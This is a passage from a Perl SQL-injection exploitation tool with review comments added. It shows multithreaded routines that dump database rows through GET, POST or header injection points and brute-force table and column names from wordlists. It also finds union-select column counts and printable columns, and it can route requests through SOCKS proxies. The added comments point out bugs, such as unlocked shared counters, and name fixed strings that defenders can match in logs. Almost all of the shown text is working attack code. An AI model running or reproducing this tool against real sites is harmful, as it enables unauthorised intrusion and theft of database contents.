  1188.          }
  1189.          print "-----------------------------------------\n";
  1190.          print "Request method - $method\n";
  1191.          print "Threads - $kol_threads\n";
  1192.          print "Proxy - $proxy_message\n";
  1193.          print "----------------------\n";
  1194.          ## end from2
  1195.          ## ?????? ?????? ?? ??????? ##
  1196.          $url17 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . $table_name;
  1197.          for(0..$thr) {
  1198.              $trl[$_] = threads->create(\&gets4);
  1199.          }
  1200.          for(0..$thr) {
  1201.              $trl[$_]->join;
  1202.          }
  1203.          sub gets4 {
                    # Worker body for the row-by-row dump started by the threads->create(\&gets4)
                    # loop right above; 0..$thr is inclusive, so $kol_threads + 1 copies run at
                    # once. Each pass claims the next row index from the shared counter $num,
                    # requests that single row ("limit $num,1" appended to $url17) over the
                    # transport selected by $sql_flag (0 GET, 1 POST, 2 injected header) and
                    # prints whatever the reply carries between two "ussr" marker strings, to
                    # the terminal and to FILE (opened before this point, closed by the caller
                    # after the join). The loop stops once $num reaches $column_name_p, which
                    # holds the row count or the user-entered END position.
  1204.             $| = 1;
                    # autoflush STDOUT so the "\r" progress counter below shows up immediately
  1205.             while ($num<$column_name_p) {
  1206.                { lock($num);
  1207.                $num++; }
                       # NOTE(review): only the ++ is under the lock; the loop test above and
                       # every read of $num below are not. Another thread can advance $num in
                       # between, so a row can be fetched twice or skipped, and when several
                       # threads pass the test together a few requests past $column_name_p go out.
  1208.                if($sql_flag == 0){
  1209.                   $current = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1210.                   $content = scan_url();
  1211.                } elsif ($sql_flag == 1) {#POST
  1212.                   $current = $source_sql;
  1213.                   $sql_post = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1214.                   $content = scan_url_POST();
  1215.                } elsif($sql_flag == 2){#HEADER
  1216.                     $current = $source_sql;
  1217.                     $sql_header_query = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1218.                     $sql_header_query =~ s!\Q$search!$replacement!g;
                            # header mode: every literal occurrence of $search in the query is
                            # swapped for $replacement (\Q makes $search match as plain text)
  1219.                     $content = scan_url_HEADER();
  1220.                }  
  1221.                if ($content =~ m/ussr(.*?)ussr/img) {
                       # the row is expected between two "ussr" markers (presumably injected via
                       # $sql_CP_start/$sql_CP_end, defined elsewhere). That marker pair and the
                       # "concat_ws(0x3a," text in $url17 are constant across runs - fixed strings
                       # a defender can key on in access logs or WAF rules.
  1222.                     print "   " . $1 . "\n";
  1223.                     print FILE "  "  . $1 . "\n";
  1224.                }
  1225.                print $num . "\r";
  1226.                sleep $pause;
                       # $pause is not assigned in this sub; presumably the inter-request delay
                       # configured elsewhere - confirm
  1227.  
  1228.             }
  1229.          }
  1230.     print "----------\n";
  1231.     print "Saved in " . "z_" . $host . ".txt\n";
  1232.     close(FILE);
  1233.     goto START;
  1234.     } else {
  1235.     ## ?????? ?????? ?? ??????? ##
  1236.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  1237.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where . $limit . $filtr;
  1238.          if($sql_flag == 0){
  1239.                $current = $url16;
  1240.                $content = scan_url();
  1241.          } elsif ($sql_flag == 1) {#POST
  1242.                $current = $source_sql;
  1243.                $sql_post = $url16;
  1244.                $content = scan_url_POST();
  1245.          } elsif($sql_flag == 2){#HEADER
  1246.                     $current = $source_sql;
  1247.                     $sql_header_query = $url16;
  1248.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1249.                     $content = scan_url_HEADER();
  1250.          }  
  1251.          $column_name_p = $content;
  1252.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1253.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1254.          print "$column_name_p\n";
  1255.          print "----------\n";
  1256.          ## start from2 ##
  1257.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
  1258.          $choice = <STDIN>;
  1259.          chomp $choice;
  1260.          $thr = $kol_threads; # ???-?? ???????
  1261.          if ($choice == 1) {
  1262.               $num = -1; # ?? ????????
  1263.          } else {
  1264.               print "Enter START_position: ";
  1265.               $choice1 = <STDIN>;
  1266.               chomp $choice1;
  1267.               $num = $choice1-2;
  1268.               print "Enter END_position: ";
  1269.               $choice2 = <STDIN>;
  1270.               chomp $choice2;
  1271.               $column_name_p = $choice2-1;
  1272.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  1273.          }
  1274.          print "-----------------------------------------\n";
  1275.          print "Request method - $method\n";
  1276.          print "Threads - $kol_threads\n";
  1277.          print "Proxy - $proxy_message\n";
  1278.          print "----------------------\n";
  1279.          ## end from2
  1280.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
  1281.          for(0..$thr) {
  1282.              $trl[$_] = threads->create(\&gets5);
  1283.          }
  1284.          for(0..$thr) {
  1285.              $trl[$_]->join;
  1286.          }
  1287.          sub gets5 {
                    # Same worker as gets4, but for the filtered dump: $url18 already carries the
                    # user-entered "where" condition, and each pass fetches one row of it
                    # ("limit $num,1") over GET, POST or injected header per $sql_flag, printing
                    # the text found between the two "ussr" markers to the terminal and to FILE.
                    # $kol_threads + 1 copies run concurrently (0..$thr is inclusive); the loop
                    # ends when the shared counter $num reaches $column_name_p.
  1288.             $| = 1;
                    # autoflush so the "\r" progress line below is visible
  1289.             while ($num<$column_name_p) {
  1290.                { lock($num);
  1291.                $num++; }
                       # NOTE(review): the loop test and the reads of $num below are outside the
                       # lock, so rows may be duplicated or skipped and a few extra requests
                       # past $column_name_p can be sent when threads finish together.
  1292.                if($sql_flag == 0){
  1293.                   $current = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1294.                   $content = scan_url();
  1295.                }elsif ($sql_flag == 1) {#POST
  1296.                   $current = $source_sql;
  1297.                   $sql_post = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1298.                   $content = scan_url_POST();
  1299.                } elsif($sql_flag == 2){#HEADER
  1300.                     $current = $source_sql;
  1301.                     $sql_header_query = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1302.                     $sql_header_query =~ s!\Q$search!$replacement!g;
                            # replace each literal $search in the header query with $replacement
  1303.                     $content = scan_url_HEADER();
  1304.                }  
  1305.                if ($content =~ m/ussr(.*?)ussr/img) {
                       # "ussr" marker pair: constant response delimiter, same indicator as gets4
  1306.                     print "   " . $1 . "\n";
  1307.                     print FILE "  "  . $1 . "\n";
  1308.                }
  1309.                print $num . "\r";
  1310.                sleep $pause;
                       # $pause: inter-request delay, set elsewhere - confirm
  1311.  
  1312.             }
  1313.          }
  1314.          print "----------\n";
  1315.          print "Saved in " . "z_" . $host . ".txt\n";
  1316.          close(FILE);
  1317.          goto START;
  1318.     }
  1319. }
  1320. if ($choice == 8) {
           # Menu branch 8: guess table names (option 1) or the column names of one table
           # (option 2) by replaying a wordlist through the injection point. Hits are printed
           # and appended to z_<host>.txt. Both options end in "goto START1", so this branch
           # is only left through option 3 (goto START_global, a label defined elsewhere).
  1321.    START1:
  1322.  
  1323.    print "    [1] Brute table\n";
  1324.    print "    [2] Brute column\n";
  1325.    print "    [3] Main menu\n";
  1326.    print "----------\n";
  1327.    $choice = <STDIN>;
  1328.    chomp $choice;
  1329.    print "Your choice: $choice\n";
  1330.    $url19 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
           # connectivity probe: the literal "concat(0x7665723a,version())" is sent as-is and
           # the reply is expected to carry the result between two "ussr" marker strings.
           # Both strings are the same on every run - useful log/WAF indicators for this tool.
  1331.    print "Check version(): ";
  1332.    $current = $url19;
  1333.    $content = scan_url();
  1334.    $ver = $content;
  1335.    $ver =~ m/ussr(.*?)ussr/img;
  1336.    $ver = $1;
           # NOTE(review): $1 is copied without checking that the match succeeded. Perl keeps
           # $1 from the last *successful* match in scope, so a failed probe can leave a
           # stale capture here and the "Can't get data" branch below is then skipped.
  1337.    if ($ver) {
  1338.          print " $ver \n";
  1339.    } else {
  1340.          print " Can't get data \n";
  1341.          goto START1;
  1342.    }
  1343.    print "-------------\n";
  1344.    if ($choice == 1) {
  1345.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # results file, opened for append (original comment garbled)
               # NOTE(review): two-arg open on a bareword handle with no status check. If it
               # fails, every "print FILE1" below is dropped without any message (no warnings
               # pragma is in effect). $host is derived from the target URL; a 3-arg open with
               # "or die" would at least make the failure visible.
  1346.        print "   Brute tables\n";
  1347.        print "   -------------\n";
  1348.        print FILE1 "   Brute tables\n";
  1349.        print FILE1 "   -------------\n";
  1350.        open(FILE, "<", $source_table_list);
               # wordlist read, also unchecked: if the file is missing @tables4 stays empty,
               # $size is 0, and the gets6 loop below still runs once with $num == 0 and an
               # undefined entry, i.e. one request whose table name is only $pref_brute.
  1351.        while(<FILE>) {
  1352.          chomp;
  1353.          push(@tables4, $_);
  1354.        }
  1355.        close(FILE);
  1356.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  1357.        $choice = <STDIN>;
  1358.        chomp $choice;
  1359.        if ($choice == 1) {
  1360.               print "Enter your prefix for brute tables: ";
  1361.               $choice = <STDIN>;
  1362.               chomp $choice;
  1363.               $pref_brute = $choice;
  1364.        } else {
  1365.               $pref_brute = "";
  1366.        }
  1367.        $size = 0;
  1368.        $size = @tables4;
  1369.        print "File: $source_table_list\n";
  1370.        print "Tables: $size\n";
  1371.        print "-------------\n";
  1372.        print "Request method - $method\n";
  1373.        print "Threads - $kol_threads\n";
  1374.        print "Proxy - $proxy_message\n";
  1375.        print "----------------------\n";
  1376.        $thr = $kol_threads; # number of threads (original comment garbled)
  1377.        $num = -1; # shared index; the first locked ++ yields 0 (original comment garbled)
  1378.        for(0..$thr) {
               # 0..$thr is inclusive: $kol_threads + 1 worker threads are created
  1379.             $trl[$_] = threads->create(\&gets6);
  1380.        }
  1381.        for(0..$thr) {
  1382.             $trl[$_]->join;
  1383.        }
  1384.        sub gets6 {
                    # Worker: claims the next wordlist index from the shared $num and asks the
                    # injection point to "select concat_ws(0x3a,$num) from <prefix+candidate>".
                    # A reply containing the "ussr" markers means the select ran, i.e. the table
                    # exists; the candidate is then printed and appended to FILE1.
  1385.             $| = 1;
  1386.             while ($num<$size) {
  1387.                { lock($num);
  1388.                $num++; }
                       # NOTE(review): the loop test and the reads of $num below are outside the
                       # lock, and there is no "if ($num < $size)" guard like the one in gets502.
                       # Threads racing at the end push $num past $#tables4, and those iterations
                       # still send a request whose table name is just $pref_brute.
  1389.                $current1 = $pref_brute . $tables4[$num];
  1390.                $url25 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $current1 . $limit . $filtr;
  1391.                $current = $url25;
  1392.                $content = scan_url();
  1393.                if ($content =~ m/ussr(.*?)ussr/img) {
  1394.                     print "   ---> " . $current1 . "\n";
  1395.                     print FILE1 "  "  . $current1 . "\n";
  1396.                }
  1397.                print $num . "\r";
  1398.                sleep $pause;
                       # $pause: inter-request delay, assigned elsewhere - confirm
  1399.  
  1400.             }
  1401.        }
  1402.        print "----------\n";
  1403.        print "Saved in " . "z_" . $host . ".txt\n";
  1404.        close(FILE1);
  1405.        goto START1;
  1406.    }
  1407.    if ($choice == 2) {
  1408.          open( FILE1, ">>" . "z_" .$host . ".txt" ); # results file, opened for append (original comment garbled); same unchecked two-arg open as above
  1409.          print "   Brute columns\n";
  1410.          print "   -------------\n";
  1411.          print FILE1 "   Brute columns\n";
  1412.          print FILE1 "   -------------\n";
  1413.          print "Enter the table_name for brute: \n";
  1414.          $choice = <STDIN>;
  1415.          chomp $choice;
  1416.          if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
                 # a name containing "-" is wrapped in backticks before it is used as an identifier
  1417.          $table = $choice;
  1418.          print "Brute columns for table [ " . $table . " ]\n";
  1419.          print "-------------\n";
  1420.          print "   Check table exist: ";
  1421.          $url20 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,$table)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
                 # $table comes straight from STDIN and is interpolated into the probe; the fixed
                 # "concat(0x7665723a," prefix is the same constant indicator as in $url19
  1422.          $current = $url20;
  1423.          $content = scan_url();
  1424.          $ver =$content;
  1425.          $ver =~ m/ussr(.*?)ussr/img;
  1426.          $ver = $1;
                 # NOTE(review): same unguarded copy of $1 as the version probe - a stale capture
                 # from an earlier successful match can make a missing table look present
  1427.          if ($ver) {
  1428.              print " Ok \n";
  1429.          } else {
  1430.              print " No such table... \n";
  1431.              goto START1;
  1432.          }
  1433.          open(FILE, "<", $source_column_list);
                 # unchecked wordlist open; on failure @columns4 is empty and gets7 still runs
                 # one iteration with an undefined entry (see the table branch above)
  1434.          while(<FILE>) {
  1435.             chomp;
  1436.             push(@columns4, $_);
  1437.          }
  1438.          close(FILE);
  1439.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  1440.        $choice = <STDIN>;
  1441.        chomp $choice;
  1442.        if ($choice == 1) {
  1443.               print "Enter your prefix for brute columns: ";
  1444.               $choice = <STDIN>;
  1445.               chomp $choice;
  1446.               $pref_brute = $choice;
  1447.        } else {
  1448.               $pref_brute = "";
  1449.        }
  1450.          $size = 0;
  1451.          $size = @columns4;
  1452.          print "-------------\n";
  1453.          print "File: $source_column_list\n";
  1454.          print "Columns: $size\n";
  1455.          print "-------------\n";
  1456.          print "Request method - $method\n";
  1457.          print "Threads - $kol_threads\n";
  1458.          print "Proxy - $proxy_message\n";
  1459.          print "----------------------\n";
  1460.          $thr = $kol_threads; # number of threads (original comment garbled)
  1461.        $num = -1; # shared index reset for the gets7 workers (original comment garbled)
  1462.        for(0..$thr) {
               # inclusive range again: $kol_threads + 1 workers
  1463.             $trl[$_] = threads->create(\&gets7);
  1464.        }
  1465.        for(0..$thr) {
  1466.             $trl[$_]->join;
  1467.        }
  1468.        sub gets7 {
                    # Worker: tries "select concat_ws(0x3a,<prefix+candidate>) from $table" for
                    # the next wordlist entry; "ussr" markers in the reply mean the column exists.
  1469.             $| = 1;
  1470.             while ($num<$size) {
  1471.                { lock($num);
  1472.                $num++; }
                       # NOTE(review): same unguarded read of $num after the lock as in gets6;
                       # indices past $#columns4 produce a request with only $pref_brute.
  1473.                $current1 = $pref_brute . $columns4[$num];
  1474.                $url26 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table . $limit . $filtr;
  1475.                $current = $url26;
  1476.                $content = scan_url();
  1477.                if ($content =~ m/ussr(.*?)ussr/img) {
  1478.                     print "   ---> " . $current1 . "\n";
  1479.                     print FILE1 "  "  . $current1 . "\n";
  1480.                }
  1481.                print $num . "\r";
  1482.                sleep $pause;
  1483.  
  1484.             }
  1485.        }
  1486.        print "----------\n";
  1487.        print "Saved in " . "z_" . $host . ".txt\n";
  1488.        close(FILE1);
  1489.        goto START1;
  1490.    }
  1491.    if ($choice == 3) {
  1492.        goto START_global;
  1493.    }
  1494. }
  1495. if ($choice == 9) {
  1496.   if ($source_sql_c =~ m/^https:\/\/?([^\/]+)/i) {
  1497.      $host5 = $1;
  1498.      $https_flag = 1;
  1499.      print "----------------------\n";
  1500.      print "HTTPS mode enabled\n";
  1501.      print "----------------------\n";
  1502.   }
  1503.   $host = $host5;
  1504. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  1505.     print "-----------------------------------------\n";
  1506.     print "Authorization required, wait please....";
  1507.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  1508.     $ck1 = collect($answ1);
  1509.     $https_auth_check = 1;
  1510.     print " DONE\n";
  1511.     print "-----------------------------------------\n";
  1512. }
  1513.   if ($use_socks == 1 && $socks_check == 0) {
  1514.   $check_url = $host;
  1515.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  1516.            . "Host: $check_host\r\n"
  1517.            . "Referer: http://" . $check_url . "\r\n"
  1518.            . "Accept: */*\r\n"
  1519.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  1520.            . "Connection: close\r\n\r\n";
  1521.    print "----------------------------------------\n";
  1522.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  1523.    print "Timeout = 5 sec:\n";
  1524.    print "----------------------------------------\n";
  1525.    $socks_check = 0;
  1526.    $check_socks = socks_check();
  1527.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  1528.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  1529.   if ($current_proxy_host) {
  1530.      $socks_check = 1;
  1531.      print "Will use --> $proxy_message\n";
  1532.   } else {
  1533.      $socks_check = 0;
  1534.      $proxy_message = "No";
  1535.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  1536.   }
  1537. }
  1538.   open( FILE1, ">>" . "z_" . $host5. ".txt"); # ???? ??? ?????? ???????????
  1539.   if ($sql_mess_type == 0) {
  1540.       $mess_type = "When wrong";
  1541.   } else {
  1542.       $mess_type = "When right";
  1543.  
  1544.   }
  1545.   ## ?????????? ?????? ???????? ??????? ??? ?????? ##
  1546.   print "Threads - $kol_threads\n";
  1547.   print "Method - $method\n";
  1548.   print "Mysql inj URL - ". $source_sql_c . $plus_c . "union" . $plus_c . "select...." . $filtr_c .   "\n";
  1549.   print "Message - [" . $sql_mess .  "]\n";
  1550.   print "Message type - [" . $mess_type .  "]\n";
  1551.   print "--------------------------------------\n";
  1552.   print "Check first 20 columns - no limit\n";
  1553.   print "--------------------------------------\n";
  1554.  
  1555.   $current_column_start = 1;
  1556.   $current_column_number = 20;
  1557.   $current_column_limit = "";
  1558.               %aa = ();
  1559.               $c_number = 0;
  1560.               $good_url = "";
  1561.               $aa = gets5000();
  1562.               $data1 = "";
  1563.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1564.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1565.               if ($good_url) {
  1566.                   print "---------------------------\n";
  1567.                   print "Column number = " . $c_number . "\n";
  1568.                   print "URL - " . $good_url . "\n";
  1569.                   print FILE1 "------------------\n";
  1570.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1571.                   print FILE1 "------------------\n";
  1572.                   print FILE1 $good_url . "\n";
  1573.                   goto PRINTABLE_COLUMN;
  1574.               }
  1575.   #############################################################
  1576.  ## ?????????? ?????? ???????? ??????? limit+0,1 ##
  1577.   print "--------------------------------------\n";
  1578.   print "Check first 20 columns - limit" . $plus_c . "0,1\n";
  1579.   print "--------------------------------------\n";
  1580.  
  1581.   $current_column_start = 1;
  1582.   $current_column_number = 20;
  1583.   $current_column_limit = "0,1";
  1584.               %aa = ();
  1585.               $c_number = 0;
  1586.               $good_url = "";
  1587.               $aa = gets5000();
  1588.               $data1 = "";
  1589.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1590.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1591.               if ($good_url) {
  1592.                   print "---------------------------\n";
  1593.                   print "Column number = " . $c_number . "\n";
  1594.                   print "URL - " . $good_url . "\n";
  1595.                   print FILE1 "------------------\n";
  1596.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1597.                   print FILE1 "------------------\n";
  1598.                   print FILE1 $good_url . "\n";
  1599.                   goto PRINTABLE_COLUMN;
  1600.               }
  1601.   #############################################################
  1602.   ## ?????????? ?????? ???????? ??????? limit+1,1 ##
  1603.   print "--------------------------------------\n";
  1604.   print "Check first 20 columns - limit" . $plus_c . "1,1\n";
  1605.   print "--------------------------------------\n";
  1606.  
  1607.   $current_column_start = 1;
  1608.   $current_column_number = 20;
  1609.   $current_column_limit = "1,1";
  1610.               %aa = ();
  1611.               $c_number = 0;
  1612.               $good_url = "";
  1613.               $aa = gets5000();
  1614.               $data1 = "";
  1615.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1616.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1617.               if ($good_url) {
  1618.                   print "---------------------------\n";
  1619.                   print "Column number = " . $c_number . "\n";
  1620.                   print "URL - " . $good_url . "\n";
  1621.                   print FILE1 "------------------\n";
  1622.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1623.                   print FILE1 "------------------\n";
  1624.                   print FILE1 $good_url . "\n";
  1625.                   goto PRINTABLE_COLUMN;
  1626.               }
  1627.   #################################################################
  1628.   ## ?????????? ??????? ? 21 ?? sql_max_column_number ??? ?????? ##
  1629.   print "--------------------------------------\n";
  1630.   print "Check columns from 21 to $sql_max_column_number - no limit\n";
  1631.   print "--------------------------------------\n";
  1632.  
  1633.   $current_column_start = 21;
  1634.   $current_column_number = $sql_max_column_number;
  1635.   $current_column_limit = "";
  1636.               %aa = ();
  1637.               $c_number = 0;
  1638.               $good_url = "";
  1639.               $aa = gets5000();
  1640.               $data1 = "";
  1641.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1642.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1643.               if ($good_url) {
  1644.                   print "---------------------------\n";
  1645.                   print "Column number = " . $c_number . "\n";
  1646.                   print "URL - " . $good_url . "\n";
  1647.                   print FILE1 "------------------\n";
  1648.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1649.                   print FILE1 "------------------\n";
  1650.                   print FILE1 $good_url . "\n";
  1651.                   goto PRINTABLE_COLUMN;
  1652.               }
  1653.   ################################################################
  1654.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+0,1 ##
  1655.   print "--------------------------------------\n";
  1656.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "0,1\n";
  1657.   print "--------------------------------------\n";
  1658.  
  1659.   $current_column_start = 21;
  1660.   $current_column_number = $sql_max_column_number;
  1661.   $current_column_limit = "0,1";
  1662.               %aa = ();
  1663.               $c_number = 0;
  1664.               $good_url = "";
  1665.               $aa = gets5000();
  1666.               $data1 = "";
  1667.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1668.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1669.               if ($good_url) {
  1670.                   print "---------------------------\n";
  1671.                   print "Column number = " . $c_number . "\n";
  1672.                   print "URL - " . $good_url . "\n";
  1673.                   print FILE1 "------------------\n";
  1674.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1675.                   print FILE1 "------------------\n";
  1676.                   print FILE1 $good_url . "\n";
  1677.                   goto PRINTABLE_COLUMN;
  1678.               }
  1679.   ################################################################
  1680.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+1,1 ##
  1681.   print "--------------------------------------\n";
  1682.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "1,1\n";
  1683.   print "--------------------------------------\n";
  1684.  
  1685.   $current_column_start = 21;
  1686.   $current_column_number = $sql_max_column_number;
  1687.   $current_column_limit = "1,1";
  1688.               %aa = ();
  1689.               $c_number = 0;
  1690.               $good_url = "";
  1691.               $aa = gets5000();
  1692.               $data1 = "";
  1693.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1694.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1695.               if ($good_url) {
  1696.                   print "---------------------------\n";
  1697.                   print "Column number = " . $c_number . "\n";
  1698.                   print "URL - " . $good_url . "\n";
  1699.                   print FILE1 "------------------\n";
  1700.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1701.                   print FILE1 "------------------\n";
  1702.                   print FILE1 $good_url . "\n";
  1703.                   goto PRINTABLE_COLUMN;
  1704.               }
  1705.   #############################################################
  1706.   sub gets5000 {
                    # Column-count search for the union-based injection. Builds one candidate
                    # URL per column count from $current_column_start to $current_column_number
                    # ("union select 1", "union select 1,2", ..., optionally followed by
                    # "limit $current_column_limit"), then lets $kol_threads + 1 gets502 workers
                    # run them through column_check(). Returns a hashref of the form
                    # { index => "url||column_count" } merged from every worker's result; the
                    # caller picks an entry from it and sets the $current_column_* globals again
                    # before each call (they are read and, for $current_column_start, overwritten here).
  1707.                    $ii = 0;
  1708.                    $i = $current_column_start;
  1709.                    $union = "";
  1710.                    $size = 0;
  1711.                    while($i <= $current_column_number) {
  1712.                     if ($current_column_start < 21) {
  1713.                       if($i == 1) {
  1714.                          $union=$i;
  1715.                       } else {
  1716.                          $union = $union . "," . $i;
  1717.                       }
  1718.                     } else {
  1719.                          if($current_column_start == 21) {
  1720.                              $union = $union . "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21";
  1721.                              $current_column_start = 0;
                                   # first pass of the 21.. range emits the whole list at once, then
                                   # the global is zeroed so later passes take the "," . $i branch
                                   # above (side effect: the caller must reset it before the next call)
  1722.                          } else {
  1723.                              $union = $union . "," . $i;
  1724.                          }
  1725.                     }
  1726.                       if ($current_column_limit) {
  1727.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
  1728.                       } else {
  1729.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
  1730.                       }
  1731.                       push(@columns_brute, $current11);
  1732.                       push(@columns_brute_n, $i);
                              # NOTE(review): @columns_brute / @columns_brute_n are only appended to
                              # and never emptied in this sub, while $num restarts at -1 below.
                              # Unless the caller clears them (not visible here), every later call
                              # re-tests all URLs from the previous passes as well.
  1733.                       $i++;
  1734.                    }
  1735.                    $size = @columns_brute;
  1736.                    %res = ();
  1737.                    $thr502 = $kol_threads; # number of threads (original comment garbled)
  1738.                    $num = -1; # shared index; first locked ++ yields 0 (original comment garbled)
  1739.                    for(0..$thr502) {
                          # inclusive range: $kol_threads + 1 workers. @thr502 (the thread array)
                          # is a different variable from the scalar $thr502.
  1740.                       $thr502[$_] = threads->create(\&gets502);
  1741.                    }
  1742.                    for(0..$thr502) {
  1743.                       %res = (%res, %{$thr502[$_]->join});
                             # each worker returns \%hash on a hit, or nothing if its loop ran out;
                             # with no strict refs in effect, dereferencing that undef appears to
                             # merge an empty list rather than die - confirm
  1744.                    }
  1745.                    sub gets502 {
                             # Worker: takes the next candidate URL, asks column_check() (defined
                             # elsewhere; assumed to test $current10 and return 1 on the right
                             # column count - confirm) and returns { index => "url||count" } on
                             # the first hit. %hash is a package global, but ithreads clone globals
                             # per thread, so each worker has its own copy.
  1746.                             $| = 1;
  1747.                             %hash = ();
  1748.                             while ($num < $size) {
  1749.                                   { lock($num);
  1750.                                   $num++; }
  1751.                                   $ii = $num;
                                         # $ii is read after the lock is released, so it may already be
                                         # an index another worker claimed; the < $size guard below at
                                         # least keeps the array accesses in range
  1752.                                   if ($ii < $size) {
  1753.                                      $current10 = $columns_brute[$num];
  1754.                                      $nom = $columns_brute_n[$num];
  1755.                                      $column_brute_flag = column_check();
  1756.                                      if ($column_brute_flag == 1) {
  1757.                                          $hash{$ii} = $current10 . "||" . $nom;
  1758.                                          $ii = $size;
  1759.                                          break;
                                                 # NOTE(review): "break" is not a Perl loop keyword here (no
                                                 # 'switch' feature is enabled); without strict it is a bareword
                                                 # that does nothing, so the return on the next line is what
                                                 # ends this worker. The "$ii = $size" above is likewise dead.
  1760.                                          return \%hash;
  1761.                                      }
  1762.                                   }
  1763.                                   print $num . "\r";
  1764.                                   sleep $pause;
                                         # $pause: inter-request delay, assigned elsewhere - confirm
  1765.                             }
  1766.                    }
                    # the nested sub definition above is compile-time only; execution continues here
  1767.                    return \%res;
  1768.             }
  1769.  print "----------\n";
  1770.  print "Can't find column number...\n";
  1771.  close(FILE1);
  1772.  goto START;
  1773.  #################################################################
  1774.  PRINTABLE_COLUMN:
  1775.   print "--------------------------------------\n";
  1776.   print "Searching printable column - no limit\n";
  1777.   print "--------------------------------------\n";
  1778.   if (!$current_column_limit) {
  1779.         $current_column_limit= "";
  1780.   } else {
  1781.       if ($current_column_limit == "0,1") {goto LIMIT0;}
  1782.       if ($current_column_limit == "1,1") {goto LIMIT1;}
  1783.   }
  1784.               %aa = ();
  1785.               $print_col = 0;
  1786.               $good_url = "";
  1787.               $aa = gets6000();
  1788.               $data1 = "";
  1789.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1790.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1791.               if ($print_col) {
  1792.                   print "---------------------------\n";
  1793.                   print "Printable column = " . $print_col . "\n";
  1794.                   print "Right url - " . $good_url . "\n";
  1795.                   print FILE1 "------------------\n";
  1796.                   print FILE1 "Printable column:" . $print_col . "\n";
  1797.                   print FILE1 "------------------\n";
  1798.                   print FILE1 $good_url . "\n";
  1799.                   print "----------\n";
  1800.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1801.                   close(FILE1);
  1802.                   goto START;
  1803.               }
  1804.   #############################################################
  1805.   LIMIT0:
  1806.   print "--------------------------------------\n";
  1807.   print "Searching printable column - limit" . $plus_c . "0,1\n";
  1808.   print "--------------------------------------\n";
  1809.   $current_column_limit = "0,1";
  1810.               %aa = ();
  1811.               $print_col = 0;
  1812.               $good_url = "";
  1813.               $aa = gets6000();
